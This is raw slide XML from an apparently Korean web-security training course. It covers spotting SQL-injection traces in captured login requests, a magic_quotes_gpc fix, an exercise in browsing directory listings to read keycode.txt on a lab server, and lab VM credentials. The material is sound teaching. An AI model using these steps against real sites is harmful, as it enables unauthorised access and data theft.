            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 들어오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷들 중 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/member/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>member_login_check.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정보로 들어오는 패킷들을 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>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패킷에 오른쪽 마우스 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭 하여 패킷의 상세한 내용을 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</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313" name="_x208263440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D5C21D-234A-40ED-BCFF-387B2E08F7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5070" y="410841"/>
            <a:ext cx="288925" cy="18415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_x208262560">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4D4835-9E31-4CD3-BDD9-09ACA4C9D2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3358"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500178" y="660305"/>
            <a:ext cx="5400675" cy="2100310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13317" name="_x208263200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB5E7A8-DE88-42F5-AAF2-16AE0D1194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178" y="3021981"/>
            <a:ext cx="5400675" cy="2830513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13319" name="_x208264080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8EFD30-37AC-4BD2-8AF6-024BD8C1A3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7730" y="502916"/>
            <a:ext cx="5400675" cy="307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95610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Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내용에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정보에 일반적인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 같은 형태가 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"select" "if“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 같은 쿼리문이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>껴있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 것을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(%27, %28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>등은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 문에 들어 있는 특수문자 이다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5068957"/>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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 서버 홈페이지에서 터미널 아이콘 클릭 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/php.ini</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2. httpd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service httpd restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>󰏮</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>mysqld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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289" name="_x208263280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D7B878-AC85-46D4-9325-CCB5DB729C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457201"/>
            <a:ext cx="5400675" cy="3887788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="_x208262080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4349C7-68FA-45C7-987C-C9E9F0F4D2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146" y="1101726"/>
            <a:ext cx="5400675" cy="2598738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="_x208262960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355AE2CF-A601-4890-B482-C5E8A3A927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9181" y="4514472"/>
            <a:ext cx="5400675" cy="7778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2D0C28F-92FC-4F72-97A8-EA3E1447FBC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="5577044"/>
            <a:ext cx="5616792" cy="911953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1.  # check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12295" name="_x208264000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF5FFC9-B255-4AEE-9F82-B39DD9C73C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6" y="5843163"/>
            <a:ext cx="5446713" cy="58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8547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vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> player </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 실행시킨다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player -&gt; file -&gt; open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>클릭후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ovf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </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B4E4B352-BAC7-498F-9D7C-95CA3A48CB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662940" y="840921"/>
            <a:ext cx="4667995" cy="3780745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3B6946-FEC8-4E8C-832E-85E63BDD214A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect r="-521" b="48076"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362912" y="906235"/>
            <a:ext cx="4724187" cy="2008415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5729875-7D9E-438A-B7F5-0CD26D867875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362912" y="3197484"/>
            <a:ext cx="5148812" cy="1137752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="806473553"/>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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 직접 객체 참조</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공격자는 현재 디렉토리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리스팅</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있는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이때 게시글과 관련된 디렉토리 밑에 접근하여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게시글에</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파일을 업로드 하면 보관되는 경로가 어디인지 확인하고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항목들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keycode.txt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파일안의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확인하시오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 공격을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067061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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>프로그램 실행</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인터넷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>http://web.navy.mil.kr/webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하여 피해 서버에 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>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웹 페이지에 게시글 목록에 경로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게시글 경로로 들어가 디렉토리 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC95A4B-46B6-4B8A-9EFF-4E0029417710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect b="17330"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="711502"/>
            <a:ext cx="5400040" cy="2070608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D96DF6-316D-4ACC-8CC0-E5991F115D81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3248079"/>
            <a:ext cx="5400040" cy="2774950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF23FF63-98C8-4C2B-8AEF-C9B6A5CA1D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6389254" y="711502"/>
            <a:ext cx="5204460" cy="2788031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EF824F-0B85-4F2F-BF75-D4EBFF1264E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="37017" r="2064"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359816" y="3842037"/>
            <a:ext cx="5288589" cy="2478746"/>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22708105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1884345"/>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5. keycode.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E38843D9-C7B3-455A-9398-AE2F337B28B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="703338"/>
            <a:ext cx="5400040" cy="1380490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3949C64-BB44-42EC-BA7B-AD755A4C9451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392120" y="2318657"/>
            <a:ext cx="5616792" cy="1884345"/>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터미널 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D1F73B-EECB-4CFD-8044-B12D859BF6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect t="12484" r="2788" b="12840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2866873"/>
            <a:ext cx="5249418" cy="95999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74306254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(id: root  PW: root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생들은 각자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vm</a:t>
            </a:r>
